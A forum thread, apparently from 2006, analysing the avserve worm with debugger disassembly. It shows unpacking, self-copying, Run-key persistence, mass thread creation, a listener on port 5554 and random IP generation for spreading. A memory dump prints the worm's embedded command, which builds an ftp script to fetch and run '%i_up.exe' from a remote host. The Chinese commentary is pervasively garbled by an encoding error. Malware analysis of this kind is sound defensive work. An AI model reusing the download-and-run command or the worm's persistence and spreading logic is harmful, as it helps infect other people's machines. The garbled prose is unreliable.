²é¿´: 835  |  »Ø¸´: 6
µ±Ç°Ö÷ÌâÒѾ­´æµµ¡£
µ±Ç°Ö»ÏÔʾÂú×ãÖ¸¶¨Ìõ¼þµÄ»ØÌû£¬µã»÷ÕâÀï²é¿´±¾»°ÌâµÄËùÓлØÌû

sdlj8051

½ð³æ (ÖøÃûдÊÖ)

[½»Á÷] [תÌù]avserve²¡¶¾³õ²½·ÖÎö

ÉùÃ÷£º±¾ÎĽö¹©Ñо¿Ê¹Óã¬ÈκÎÈËÀûÓñ¾ÎÄÉæ¼°µÄ¼¼ÊõÔì³ÉµÄ²»µ±ºó¹ûÓÉ×Ô¼º³Ðµ££¡
      ÓÉÓÚ±¾È˵ÚÒ»´Î·ÖÎö²¡¶¾£¬ºÜ¶à²»ÕýÈ·µÄµØ·½Çë¸÷λ´óÏÀÖ¸Õý£¡£¡£¡
      ±¾È˵ÚÒ»´Îд±¾ÎÄʱÉÐδÓйٷ½×ÊÁϳöÀ´£¡ÓÐЩµØ·½¿Ï¶¨²»ÊǺÜ׼ȷ£¡ÇëÁ½⻶ӭָÕý£¡
      ·´»ã±à»á·¢ÏÖÊäÈë±íÖ»Óм¸¸ö¼òµ¥µÄº¯Êý¡£
004027CE > B8 DD274000      MOV EAX,23918_up.004027DD  ÓÃODÔØÈë³ÌÐòÍ£ÔÚÕâÀï¡£
ÔØÈëʱ£¬ÌáʾÊÇѹËõ¹ýµÃ£¡¼ì²â¹¤¾ßʶ±ð²»³öʲô¿Ç£¬×Ô¼ºÊÔ×ÅÍÑһϰɣ¡ÔÚÍѿǹý³ÌÖиоõ¿ÇÀïÃæ°üº¬×Å¿Ç×Ô¶¯
¸´ÖÆ£¬´«²¥µÄ´úÂ룡Íѵô¿ÇÖ®ºó¸Ð¾õÆäÓ°ÏìÁ¦ÒªÐ¡¶àÁË£¡²»ÖªµÀ¶Ô²»¶Ô£¬ÏÈÍѿǰɣ¡


´úÂë:--------------------------------------------------------------------------------
004027CE > B8 DD274000      MOV EAX,23918_up.004027DD
004027D3   8000 28          ADD BYTE PTR DS:[EAX],28
004027D6   40               INC EAX  
004027D7   8100 67452301    ADD DWORD PTR DS:[EAX],1234567 //µ¥²½×ßµ½ÕâÀÏÂÃæµÄ´úÂë¸Ä±ä
004027DD   90               NOP
004027DE   A9 521DFF50      TEST EAX,50FF1D52
004027E3   64:FF35 00000000 PUSH DWORD PTR FS:[0]
004027EA   64:8925 00000000 MOV DWORD PTR FS:[0],ESP
004027F1   33C0             XOR EAX,EAX
004027F3   8908             MOV DWORD PTR DS:[EAX],ECX
±ä³É£º
004027CE > B8 DD274000      MOV EAX,23918_up.004027DD
004027D3   8000 28          ADD BYTE PTR DS:[EAX],28
004027D6   40               INC EAX
004027D7   8100 67452301    ADD DWORD PTR DS:[EAX],1234567
004027DD   B8 10984000      MOV EAX,23918_up.00409810   ÔÚEAXµÄµØÖ·´¦Éè¶Ï£¬È»ºóSHIFT+F9
004027E2   50               PUSH EAX
004027E3   64:FF35 00000000 PUSH DWORD PTR FS:[0]        µäÐÍÒì³£±êÖ¾
004027EA   64:8925 00000000 MOV DWORD PTR FS:[0],ESP
004027F1   33C0             XOR EAX,EAX
004027F3   8908             MOV DWORD PTR DS:[EAX],ECX

00409810   B8 B18740F0      MOV EAX,F04087B1          Í£ÔÚÕâÀï
00409815   8D88 82100010    LEA ECX,DWORD PTR DS:[EAX+10001082]
0040981B   8941 01          MOV DWORD PTR DS:[ECX+1],EAX
0040981E   8B5424 04        MOV EDX,DWORD PTR SS:[ESP+4]
00409822   8B52 0C          MOV EDX,DWORD PTR DS:[EDX+C]
00409825   C602 E9          MOV BYTE PTR DS:[EDX],0E9
00409828   83C2 05          ADD EDX,5
0040982B   2BCA             SUB ECX,EDX
0040982D   894A FC          MOV DWORD PTR DS:[EDX-4],ECX
00409830   33C0             XOR EAX,EAX
00409832   C3               RETN    ÕâÀï·µ»ØÏµÍ³¿Õ¼ä£¬ÎÒÓÃCtrl+F9Ò»Ö±×ßµ½ÏÂÃæ
00409833   B8 B18740F0      MOV EAX,F04087B1    Ò²¿ÉÒÔÈ¡ÏûÉÏÃæµÄ¶Ïµã£¬ÔÙÕâÀïÉè¶Ï£¬È»ºóµ¥²½×ߣ¬³ÌÐò¿ÉÖ±½Óµ½´ïOEP
00409838   64:8F05 00000000 POP DWORD PTR FS:[0]
0040983F   83C4 04          ADD ESP,4
00409842   55               PUSH EBP
00409843   53               PUSH EBX

060010B5   8945 A0          MOV DWORD PTR SS:[EBP-60],EAX     ÕâÀï¿´¼ûPEÎļþÍ·²¿ÌØÕ÷¡£
060010B8   837D A0 00       CMP DWORD PTR SS:[EBP-60],0
060010BC   75 07            JNZ SHORT ApiHook.060010C5
060010BE   33C0             XOR EAX,EAX
060010C0   E9 92000000      JMP ApiHook.06001157
¡£¡£¡£µÚÒ»´ÎÀ´µ½ÕâÀï
00340430   85C0             TEST EAX,EAX                             ; kernel32.ExitProcess
ÂÔ
00340451   C9               LEAVE
¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡ÁÓÐÒ»¸öÑ­»·£¬Ó¦¸ÃÊÇ´¦ÀíIATµÄ
00340403   51               PUSH ECX        IAT£¬ÊäÈë±íUSER32.DLL
00340404   FF93 8F120010    CALL DWORD PTR DS:[EBX+1000128F]  LoadLibrary
0034040A   85C0             TEST EAX,EAX
0034040C   74 3A            JE SHORT 00340448
0034040E   8945 FC          MOV DWORD PTR SS:[EBP-4],EAX
00340411   8B56 04          MOV EDX,DWORD PTR DS:[ESI+4]
00340414   03D3             ADD EDX,EBX
00340416   8B7E 08          MOV EDI,DWORD PTR DS:[ESI+8]
00340419   03FB             ADD EDI,EBX
0034041B   8B02             MOV EAX,DWORD PTR DS:[EDX]   
0034041D   85C0             TEST EAX,EAX
0034041F   74 1A            JE SHORT 0034043B
00340421   52               PUSH EDX
00340422   8B02             MOV EAX,DWORD PTR DS:[EDX]
00340424   03C3             ADD EAX,EBX
00340426   50               PUSH EAX
00340427   FF75 FC          PUSH DWORD PTR SS:[EBP-4]
0034042A   FF93 93120010    CALL DWORD PTR DS:[EBX+10001293]
00340430   85C0             TEST EAX,EAX
00340432   74 14            JE SHORT 00340448
00340434   AB               STOS DWORD PTR ES:[EDI]
00340435   5A               POP EDX
00340436   83C2 04          ADD EDX,4
00340439  ^EB E0            JMP SHORT 0034041B
×ß¹ýÉÏÃæÀ´µ½ÕâÀï
003401C0   8B4E 2C          MOV ECX,DWORD PTR DS:[ESI+2C]
003401C3   8B56 24          MOV EDX,DWORD PTR DS:[ESI+24]
003401C6   0356 08          ADD EDX,DWORD PTR DS:[ESI+8]
003401C9   6A 40            PUSH 40
003401CB   68 00100000      PUSH 1000
003401D0   51               PUSH ECX
003401D1   6A 00            PUSH 0
003401D3   FF12             CALL DWORD PTR DS:[EDX]
003401D5   8985 8B120010    MOV DWORD PTR SS:[EBP+1000128B],EAX
003401DB   56               PUSH ESI       Õ⼸¸öº¯ÊýÊǻָ´ÊäÈë±íµÄ£¬Ó¦¸Ã¡£
003401DC   E8 D7030000      CALL 003405B8  ¸ú½øÈ¥»á·¢ÏÖ£¬Ëü»á¿½±´ÊäÈë±í£¬ºÍÆäËûһЩshell¡£
003401E1   56               PUSH ESI      
003401E2   E8 DF040000      CALL 003406C6
003401E7   56               PUSH ESI
003401E8   E8 CB020000      CALL 003404B8
003401ED   56               PUSH ESI
003401EE   E8 62020000      CALL 00340455
003401F3   8B4E 34          MOV ECX,DWORD PTR DS:[ESI+34]
003401F6   85C9             TEST ECX,ECX
Ò»Ö±F8µ¥²½À´µ½ÏÂÃæµØ·½
004098AE   8985 21110010    MOV DWORD PTR SS:[EBP+10001121],EAX      ; 23918_up.
004098B4   8BF0             MOV ESI,EAX
004098B6   59               POP ECX
ÂÔµ÷Ò»²¿·Ö
004098C9   59               POP ECX
004098CA   5B               POP EBX
004098CB   5D               POP EBP
004098CC   FFE0             JMP EAX     ÕâÀïÌøµ½ÐµÄOEP£¬ºÍºÍÔ­À´ÔØÈëµÄµØÖ·Ò»Ñù¡£

004027CE > 55               PUSH EBP ÕâʱÈë¿Úµã¾Í±ä³ÉÁËÕâÑùÁË¡£
±¾ÈËÍÑ¿Çˮƽһ°ã£¬ÀíÂ۵Ķ«Î÷ÎҾͲ»°àÃÅŪ¸°ÁË£¡
004027CF   8BEC             MOV EBP,ESP
004027D1   6A FF            PUSH -1
004027D3   68 28514000      PUSH 23918_up.00405128
µ½ÁËÈë¿Úµã¾Í¿ÉÒÔDUMP³ÌÐòÁË£¬È»ºóÓÃImportRECÐÞ¸´Ò»Ï£¬³ÌÐò¾ÍÍѿdzɹ¦¡£²»¹ýÄãÔÚÔËÐÐ֮ǰ½¨ÒéÄãÏÈ´òÉϲ¹¶¡¡£

ÍÑÏÂÀ´ÁË£¬ÔÛÃÇÀ´·ÖÎöһϸò¡¶¾µÄ¹¤×÷Á÷³Ì¡£ ÐÞ¸´ºÃÖ®ºóÓÃODÔØÈëÍѿǺóµÄ³ÌÐò£¬¿´Ò»ÏÂËûµÄÊäÈë±í»ù±¾ÉϾÍÖªµÀ
ËûÊÇÈçºÎ¹¤×÷µÄÁË¡£ODÔØÈëºó£¬Ctrl+NËÑË÷µ±Ç°Ä£¿éÖеÄÃû³Æ£¡
ΪÁË¿´ÇåËüµÄÁ÷³Ì£¬ÎÒÃÇF8µ¥²½£¬Ò»²½²½µÄ¸ú¡£ÍüÁË˵ÁË£¬Õâ¸ö²¡¶¾ÓÃVCдµÄ¡£
00402896  |. 50             PUSH EAX    ÕâÊÇVC³ÌÐòÔËÐÐÌØÕ÷£¬F4µ½ÕâÀï
00402897  |. E8 4EF7FFFF    CALL dumped_.00401FEA  F7½øÈ룬Ҫ²»È»²¡¶¾¾ÍÖ±½ÓÔËÐÐÁË

00401FEA  /$ 55             PUSH EBP  ½øÈëÉÏÃæµÄcall
00401FEB  |. 8BEC           MOV EBP,ESP
00401FED  |. 51             PUSH ECX
00401FEE  |. 51             PUSH ECX
00401FEF  |. 56             PUSH ESI
00401FF0  |. FF15 44504000  CALL DWORD PTR DS:[<&kernel32.GetTickCou>; [GetTickCount
ÉÏÃæÊǵõ½ÏµÍ³×ÔÆô¶¯ÒÔÀ´ÔËÐеÄʱ¼ä¡£
00401FF6  |. 50             PUSH EAX
00401FF7  |. E8 22F0FFFF    CALL dumped_.0040101E
ÉÏÃæµÄcall×÷ÓÃÊǽ«Ê±¼ä±£´æµ½ÄÚ´æ[406F20]µ±ÖС£

00401FFC  |. 6A 01          PUSH 1
00401FFE  |. E8 6E000000    CALL dumped_.00402071
¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á
¸ú½øÉÏÃæµÄcall¡£¿´¿´ËüÊǸÉʲô»µÊµġ£
00402071  /$ 55             PUSH EBP
00402072  |. 8BEC           MOV EBP,ESP
00402074  |. 81EC 24080000  SUB ESP,824
0040207A  |. 56             PUSH ESI
0040207B  |. BE 00040000    MOV ESI,400
00402080  |. 8D85 DCF7FFFF  LEA EAX,DWORD PTR SS:[EBP-824]
00402086  |. 56             PUSH ESI                                 ; /BufSize => 400 (1024.)
00402087  |. 50             PUSH EAX                                 ; |PathBuffer
00402088  |. 6A 00          PUSH 0                                   ; |hModule = NULL
0040208A  |. FF15 34504000  CALL DWORD PTR DS:[<&kernel32.GetModuleF>; \GetModuleFileNameA µÃµ½³ÌÐò¾ä±ú
00402090  |. 8D85 DCFBFFFF  LEA EAX,DWORD PTR SS:[EBP-424]
00402096  |. 56             PUSH ESI                                 ; /BufSize => 400 (1024.)
00402097  |. 50             PUSH EAX                                 ; |Buffer
00402098  |. FF15 4C504000  CALL DWORD PTR DS:[<&kernel32.GetWindows>; \GetWindowsDirectoryA µÃµ½windows°²×°Ä¿Â¼
0040209E  |. 8D85 DCFBFFFF  LEA EAX,DWORD PTR SS:[EBP-424]   ¶ÑÕ»ÖÐÊÇÈ¡µÃµÄĿ¼
004020A4  |. 50             PUSH EAX   
004020A5  |. E8 96000000    CALL dumped_.00402140 Õâ¸öº¯Êý¸Éʲô£¬Ã»Ã÷°×ºÃÏñû¶à´ó×÷ÓÃ
004020AA  |. 80BC05 DBFBFFF>CMP BYTE PTR SS:[EBP+EAX-425],5C
004020B2  |. 59             POP ECX
004020B3  |. 5E             POP ESI
004020B4  |. 74 13          JE SHORT dumped_.004020C9
004020B6  |. 8D85 DCFBFFFF  LEA EAX,DWORD PTR SS:[EBP-424]
004020BC  |. 68 B06A4000    PUSH dumped_.00406AB0
004020C1  |. 50             PUSH EAX
004020C2  |. E8 F9050000    CALL dumped_.004026C0
ÕâÀï½øÈ¥¿´¿´ÂýÂýµÄÄã¿´¼ûÄÚ´æÖÐ
004068C8  20 69 40 00 18 69 40 00 10 69 40 00 08 69 40 00   i@.i@.i@.i@.
004068D8  00 69 40 00 F8 68 40 00 F0 68 40 00 E8 68 40 00  .i@.øh@.ðh@.èh@.
004068E8  31 35 30 20 4F 4B 0A 00 32 30 30 20 4F 4B 0A 00  150 OK..200 OK..
004068F8  32 32 36 20 4F 4B 0A 00 32 33 30 20 4F 4B 0A 00  226 OK..230 OK..
00406908  33 33 31 20 4F 4B 0A 00 32 32 30 20 4F 4B 0A 00  331 OK..220 OK..
00406918  61 76 73 65 72 76 65 00 61 76 73 65 72 76 65 2E  avserve.avserve.  ³ÌÐòÃû
00406928  65 78 65 00 65 63 68 6F 20 6F 66 66 26 65 63 68  exe.echo off&ech
00406938  6F 20 6F 70 65 6E 20 25 73 20 35 35 35 34 3E 3E  o open %s 5554>>
00406948  63 6D 64 2E 66 74 70 26 65 63 68 6F 20 61 6E 6F  cmd.ftp&echo ano
00406958  6E 79 6D 6F 75 73 3E 3E 63 6D 64 2E 66 74 70 26  nymous>>cmd.ftp&
00406968  65 63 68 6F 20 75 73 65 72 26 65 63 68 6F 20 62  echo user&echo b
00406978  69 6E 3E 3E 63 6D 64 2E 66 74 70 26 65 63 68 6F  in>>cmd.ftp&echo
00406988  20 67 65 74 20 25 69 5F 75 70 2E 65 78 65 3E 3E   get %i_up.exe>>
00406998  63 6D 64 2E 66 74 70 26 65 63 68 6F 20 62 79 65  cmd.ftp&echo bye
004069A8  3E 3E 63 6D 64 2E 66 74 70 26 65 63 68 6F 20 6F  >>cmd.ftp&echo o
004069B8  6E 26 66 74 70 20 2D 73 3A 63 6D 64 2E 66 74 70  n&ftp -s:cmd.ftp
004069C8  26 25 69 5F 75 70 2E 65 78 65 26 65 63 68 6F 20  &%i_up.exe&echo
004069D8  6F 66 66 26 64 65 6C 20 63 6D 64 2E 66 74 70 26  off&del cmd.ftp&
004069E8  65 63 68 6F 20 6F 6E 0A 00 00 00 00 31 32 37 2E  echo on.....127.
004069F8  30 2E 30 2E 31 00 00 00 25 73 25 63 00 00 00 00  0.0.1...%s%c....
00406A08  5C 5C 25 73 5C 69 70 63 24 00 00 00 EB 06        \\%s\ipc$...??
Õâ¸öÓ¦¸ÃÊǸɻµÊµĶ«Î÷°É£¨¹À¼Æ£©
004026C0  /$ 8B4C24 04      MOV ECX,DWORD PTR SS:[ESP+4]
Ê¡ÂÔÒ»²¿·Ö£¬´ó¼Ò¿ÉÒÔ×Ô¼º¸ú½ø
0040271C  |. EB 03          JMP SHORT dumped_.00402721
0040271E  |> 8D79 FC        LEA EDI,DWORD PTR DS:[ECX-4]
00402721  |> 8B4C24 0C      MOV ECX,DWORD PTR SS:[ESP+C]   avserve.exe²¡¶¾µÄÁíÒ»¸±±¾Ãû³Æ
00402725  |. F7C1 03000000  TEST ECX,3

[ Last edited by sdlj8051 on 2006-10-6 at 12:34 ]
»Ø¸´´ËÂ¥

» ²ÂÄãϲ»¶

ÒÑÔÄ   »Ø¸´´ËÂ¥   ¹Ø×¢TA ¸øTA·¢ÏûÏ¢ ËÍTAºì»¨ TAµÄ»ØÌû

yi8905

Òø³æ (ÕýʽдÊÖ)

0.5

¶¥¶¥ÎÒ¶¥¶¥¶¥


²»Öª·ÖÎöµÃ¶Ô²»
³õߨëüëÊËÆëüëÊ£¬Î´Ñë·ÉÃηַÉÃΡ£³¯¿´Ï¦ÑôÒ¹ÏôÀ䣬ֻԵ×Ô¼ºÔÚÃÎÖС£
7Â¥2007-06-03 07:06:14
ÒÑÔÄ   »Ø¸´´ËÂ¥   ¹Ø×¢TA ¸øTA·¢ÏûÏ¢ ËÍTAºì»¨ TAµÄ»ØÌû
²é¿´È«²¿ 7 ¸ö»Ø´ð

sdlj8051

½ð³æ (ÖøÃûдÊÖ)

Ê¡ÂÔÒ»²¿·Ö
0040279F  \. C3             RETN




004020C7  |. 59             POP ECX
004020C8  |. 59             POP ECX
004020C9  |> FF35 C8684000  PUSH DWORD PTR DS:[4068C8]               ;  dumped_.00406920
004020CF  |. 8D85 DCFBFFFF  LEA EAX,DWORD PTR SS:[EBP-424]
004020D5  |. 50             PUSH EAX
004020D6  |. E8 E5050000    CALL dumped_.004026C0
004020DB  |. 807D 08 00     CMP BYTE PTR SS:[EBP+8],0
004020DF  |. 59             POP ECX
004020E0  |. 59             POP ECX
004020E1  |. 74 16          JE SHORT dumped_.004020F9   ÕâÀïÅжÏÄãµÄWindows°²×°Ä¿Â¼ÏÂÃæÓÐûÓÐavserve.exeÎļþûÓÐÏÂÃæ¾Í¸´ÖÆ

004020E3  |. 8D85 DCFBFFFF  LEA EAX,DWORD PTR SS:[EBP-424]
004020E9  |. 6A 00          PUSH 0                                   ; /FailIfExists = FALSE
004020EB  |. 50             PUSH EAX                                 ; |NewFileName
004020EC  |. 8D85 DCF7FFFF  LEA EAX,DWORD PTR SS:[EBP-824]           ; |
004020F2  |. 50             PUSH EAX                                 ; |ExistingFileName
004020F3  |. FF15 48504000  CALL DWORD PTR DS:[<&kernel32.CopyFileA>>; \CopyFileA  ×Ô¶¯¸´ÖÆ
004020F9  |> 8D45 FC        LEA EAX,DWORD PTR SS:[EBP-4]
004020FC  |. 50             PUSH EAX                                 ; /pHandle
004020FD  |. 68 806A4000    PUSH dumped_.00406A80                    ; |Subkey = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
00402102  |. 68 02000080    PUSH 80000002                            ; |hKey = HKEY_LOCAL_MACHINE
00402107  |. FF15 04504000  CALL DWORD PTR DS:[<&advapi32.RegOpenKey>; \RegOpenKeyA   ÕâÀïºÜÃ÷ÏÔÁ˸ÄÄãµÄ×¢²á±í£¬Ê¹³ÌÐò×Ô¼º¿ª»ú×Ô¶¯Ö´ÐÐ
0040210D  |. 8D85 DCFBFFFF  LEA EAX,DWORD PTR SS:[EBP-424]
00402113  |. 50             PUSH EAX
00402114  |. E8 27000000    CALL dumped_.00402140
00402119  |. 59             POP ECX
0040211A  |. 50             PUSH EAX                                 ; /BufSize
0040211B  |. 8D85 DCFBFFFF  LEA EAX,DWORD PTR SS:[EBP-424]           ; |
00402121  |. 50             PUSH EAX                                 ; |Buffer
00402122  |. 6A 01          PUSH 1                                   ; |ValueType = REG_SZ
00402124  |. 6A 00          PUSH 0                                   ; |Reserved = 0
00402126  |. FF35 C8684000  PUSH DWORD PTR DS:[4068C8]               ; |ValueName = "avserve.exe"
0040212C  |. FF75 FC        PUSH DWORD PTR SS:[EBP-4]                ; |hKey
0040212F  |. FF15 08504000  CALL DWORD PTR DS:[<&advapi32.RegSetValu>; \RegSetValueExA
00402135  |. FF75 FC        PUSH DWORD PTR SS:[EBP-4]                ; /hKey
00402138  |. FF15 0C504000  CALL DWORD PTR DS:[<&advapi32.RegCloseKe>; \RegCloseKey
0040213E  |. C9             LEAVE
0040213F  \. C3             RETN ÕâÀï¾ÍÍêÁË¡£»ØÈ¥ÏÂÃæ¸É»µÊÂÁË
¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á¡Á
00402003  |. 59             POP ECX
00402004  |. 59             POP ECX
00402005  |. E8 1EF0FFFF    CALL dumped_.00401028
0040200A  |. 33F6           XOR ESI,ESI
0040200C  |. 68 746A4000    PUSH dumped_.00406A74                    ; /MutexName = "Jobaka3l"
00402011  |. 56             PUSH ESI                                 ; |InitialOwner => FALSE
00402012  |. 56             PUSH ESI                                 ; |pSecurity => NULL
00402013  |. FF15 40504000  CALL DWORD PTR DS:[<&kernel32.CreateMute>; \CreateMutexA  
´´½¨Ò»¸öÐźÅÁ¿£¬Ä¿µÄºÎÔÚ£¿
00402019  |. FF15 3C504000  CALL DWORD PTR DS:[<&kernel32.GetLastErr>; [GetLastError
0040201F  |. 3D B7000000    CMP EAX,0B7
00402024  |. 75 07          JNZ SHORT dumped_.0040202D  ÕâÀïÈç¹ûÌøµÄ»°£¬²¡¶¾¾ÍÒª¿ªÊ¼·¢ÍþÁË
00402026  |. 33C0           XOR EAX,EAX
00402028  |. 5E             POP ESI
00402029  |. C9             LEAVE
0040202A  |. C2 1000        RETN 10
0040202D  |> 53             PUSH EBX
0040202E  |. 8D45 FC        LEA EAX,DWORD PTR SS:[EBP-4]
00402031  |. 57             PUSH EDI
00402032  |. 8B3D 38504000  MOV EDI,DWORD PTR DS:[<&kernel32.CreateT>;  KERNEL32.CreateThread
´´½¨Ïß³ÌÁË
00402038  |. 50             PUSH EAX                                 ; /pThreadId
00402039  |. 56             PUSH ESI                                 ; |CreationFlags
0040203A  |. 56             PUSH ESI                                 ; |pThreadParm
0040203B  |. 68 6A1E4000    PUSH dumped_.00401E6A                    ; |ThreadFunction = dumped_.00401E6A  Ï̺߳¯ÊýµÄÖÖ×Óº¯Êý
00402040  |. 56             PUSH ESI                                 ; |StackSize
00402041  |. 56             PUSH ESI                                 ; |pSecurity
00402042  |. FFD7           CALL EDI                                 ; \CreateThread
00402044  |. BB 80000000    MOV EBX,80    Ñ­»·´´½¨0x80£½128¸öÏß³Ì
00402049  |> 8D45 F8        /LEA EAX,DWORD PTR SS:[EBP-8]
0040204C  |. 50             |PUSH EAX
0040204D  |. 56             |PUSH ESI
0040204E  |. 56             |PUSH ESI
0040204F  |. 68 F51E4000    |PUSH dumped_.00401EF5
00402054  |. 56             |PUSH ESI
00402055  |. 56             |PUSH ESI
00402056  |. FFD7           |CALL EDI
00402058  |. 4B             |DEC EBX     Ñ­»·´´½¨
00402059  |.^75 EE          \JNZ SHORT dumped_.00402049  µ½ÕâÀïÄã²»·À¸Äһϣ¡²»ÓÃËüÀ´128¸öÁË£¬Ò»¸ö¾Í¹»Äã·ÖÎöÁË

0040205B  |. 5F             POP EDI
0040205C  |. 5B             POP EBX
0040205D  |> 56             PUSH ESI                                 ; /MachineName
0040205E  |. FF15 00504000  CALL DWORD PTR DS:[<&advapi32.AbortSyste>; \AbortSystemShutdownA ÓÃÕâ¸öº¯Êý¹Ø»ú¡£
00402064  |. 68 B80B0000    PUSH 0BB8                                ; /Timeout = 3000. ms
00402069  |. FF15 1C504000  CALL DWORD PTR DS:[<&kernel32.Sleep>]    ; \Sleep   Ë¯ËüÒ»»á
Ëü˯µÃʱºòºÃÏñҲûÏûÍ££¬È¥Ï̺߳¯ÊýÄÇÀïÖ´ÐÐÈ¥ÁË
0040206F  \.^EB EC          JMP SHORT dumped_.0040205D

Ï̺߳¯Êý
00401E6A  /. 55             PUSH EBP
00401E6B  |. 8BEC           MOV EBP,ESP
00401E6D  |. 83EC 14        SUB ESP,14
00401E70  |. 56             PUSH ESI
00401E71  |. 33F6           XOR ESI,ESI
00401E73  |. 57             PUSH EDI
00401E74  |. 56             PUSH ESI                                 ; /Protocol => IPPROTO_IP
00401E75  |. 6A 01          PUSH 1                                   ; |Type = SOCK_STREAM
00401E77  |. 6A 02          PUSH 2                                   ; |Family = AF_INET
00401E79  |. FF15 F0504000  CALL DWORD PTR DS:[<&ws2_32.socket>]     ; \socket   ´´½¨socket
00401E7F  |. 8BF8           MOV EDI,EAX
00401E81  |. 83FF FF        CMP EDI,-1
00401E84  |. 75 08          JNZ SHORT dumped_.00401E8E
00401E86  |> 5F             POP EDI
00401E87  |. 33C0           XOR EAX,EAX
00401E89  |. 5E             POP ESI
00401E8A  |. C9             LEAVE
00401E8B  |. C2 0400        RETN 4
00401E8E  |> 68 B2150000    PUSH 15B2                                ; /NetShort = 15B2
00401E93  |. 66:C745 EC 020>MOV WORD PTR SS:[EBP-14],2               ; |
00401E99  |. FF15 EC504000  CALL DWORD PTR DS:[<&ws2_32.htons>]      ; \ntohs  Õâ¸öº¯ÊýºÃÏñÊÇ×ö¶Ë¿Úת»»µÄ°É£¬
ÍøÂç±à³Ìż²»ÐеÄ˵
00401E9F  |. 66:8945 EE     MOV WORD PTR SS:[EBP-12],AX
00401EA3  |. 8D45 EC        LEA EAX,DWORD PTR SS:[EBP-14]
00401EA6  |. 6A 10          PUSH 10                                  ; /AddrLen = 10 (16.)
00401EA8  |. 50             PUSH EAX                                 ; |pSockAddr
00401EA9  |. 57             PUSH EDI                                 ; |Socket
00401EAA  |. 8975 F0        MOV DWORD PTR SS:[EBP-10],ESI            ; |
00401EAD  |. FF15 18514000  CALL DWORD PTR DS:[<&ws2_32.bind>]       ; \bind  °ó¶¨Ò»¸ösocket
00401EB3  |. 83F8 FF        CMP EAX,-1
00401EB6  |. 74 0E          JE SHORT dumped_.00401EC6
00401EB8  |. 6A 05          PUSH 5                                   ; /Backlog = 5
00401EBA  |. 57             PUSH EDI                                 ; |Socket
00401EBB  |. FF15 FC504000  CALL DWORD PTR DS:[<&ws2_32.listen>]     ; \listen  ¼àÌý£¬¶ÓÁ㤶ÈÊÇ5
ÍøÂçÅ£ÈËÃÇÖªµÀÊǸÉÂðµÄ
00401EC1  |. 83F8 FF        CMP EAX,-1   ÕâÀïÌøµ½ÏÂÃæÈ¥ £¬
00401EC4  |. 75 09          JNZ SHORT dumped_.00401ECF
00401EC6  |> 57             PUSH EDI                                 ; /Socket
00401EC7  |. FF15 00514000  CALL DWORD PTR DS:[<&ws2_32.closesocket>>; \closesocket  ¹Ø±Õsocket
¸ÉÍ껵Ê£¬»¹Ã»ÍüÕâ¸ö£¡
00401ECD  |.^EB B7          JMP SHORT dumped_.00401E86
´ÓÉÏÃæÌøµ½ÏÂÃæ
00401ECF  |> 56             /PUSH ESI                                ; /pAddrLen
00401ED0  |. 56             |PUSH ESI                                ; |pSockAddr
00401ED1  |. 57             |PUSH EDI                                ; |Socket
00401ED2  |. FF15 E4504000  |CALL DWORD PTR DS:[<&ws2_32.accept>]    ; \accept  ½ÓÊÜÁ¬½Ó°ÉÕâÀïÓ¦¸ÃÍüÁË
³ÌÐòµ½ÁËÕâÀ²»¶¯ÁË£¬Ã»·¨Ïòϵ÷ÊÔÁË£¬ÒòΪÎÒûÕÒµ½Ä¿±ê
²»¹ýÍùÏ¿´¿´¾ÍÖªµÀÁË£¬Ó¦¸ÃÊDzúÉúIPµØÖ·²¢ÊÔͼ¹¥»÷¡£¾ßÌåÔõô×÷ÎÒ²»·ÖÎöÁË¡£Ëµ¶àÁ˲»ºÃ¡£
00401ED8  |. 8D4D FC        |LEA ECX,DWORD PTR SS:[EBP-4]
00401EDB  |. 51             |PUSH ECX                                ; /pThreadId
00401EDC  |. 56             |PUSH ESI                                ; |CreationFlags
00401EDD  |. 50             |PUSH EAX                                ; |pThreadParm
00401EDE  |. 68 031B4000    |PUSH dumped_.00401B03                   ; |ThreadFunction = dumped_.00401B03
00401EE3  |. 56             |PUSH ESI                                ; |StackSize
00401EE4  |. 56             |PUSH ESI                                ; |pSecurity
00401EE5  |. FF15 38504000  |CALL DWORD PTR DS:[<&kernel32.CreateThr>; \CreateThread
00401EEB  |. 6A 19          |PUSH 19                                 ; /Timeout = 25. ms
00401EED  |. FF15 1C504000  |CALL DWORD PTR DS:[<&kernel32.Sleep>]   ; \Sleep
00401EF3  \.^EB DA          \JMP SHORT dumped_.00401ECF
00401EF5   . 83EC 54        SUB ESP,54
00401EF8   . 53             PUSH EBX
00401EF9   . 55             PUSH EBP
00401EFA   . 8B2D DC504000  MOV EBP,DWORD PTR DS:[<&user32.wsprintfA>;  user32.wsprintfA
ÕâÀïÔÙÊ¡ÂÔÒ»²¿·Ö
00401FBB   . 8BCE           MOV ECX,ESI
00401FBD   . F7F9           IDIV ECX
00401FBF   . 52             PUSH EDX
00401FC0   > 8D4424 20      LEA EAX,DWORD PTR SS:[ESP+20]
00401FC4   . 68 4C6A4000    PUSH dumped_.00406A4C                    ;  ASCII "%i.%i.%i.%i"
IPµØÖ·µÄ¸ñʽӴ
00401FC9   . 50             PUSH EAX
00401FCA   . FFD5           CALL EBP
00401FCC   . 83C4 18        ADD ESP,18
00401FCF   . 8D4424 10      LEA EAX,DWORD PTR SS:[ESP+10]
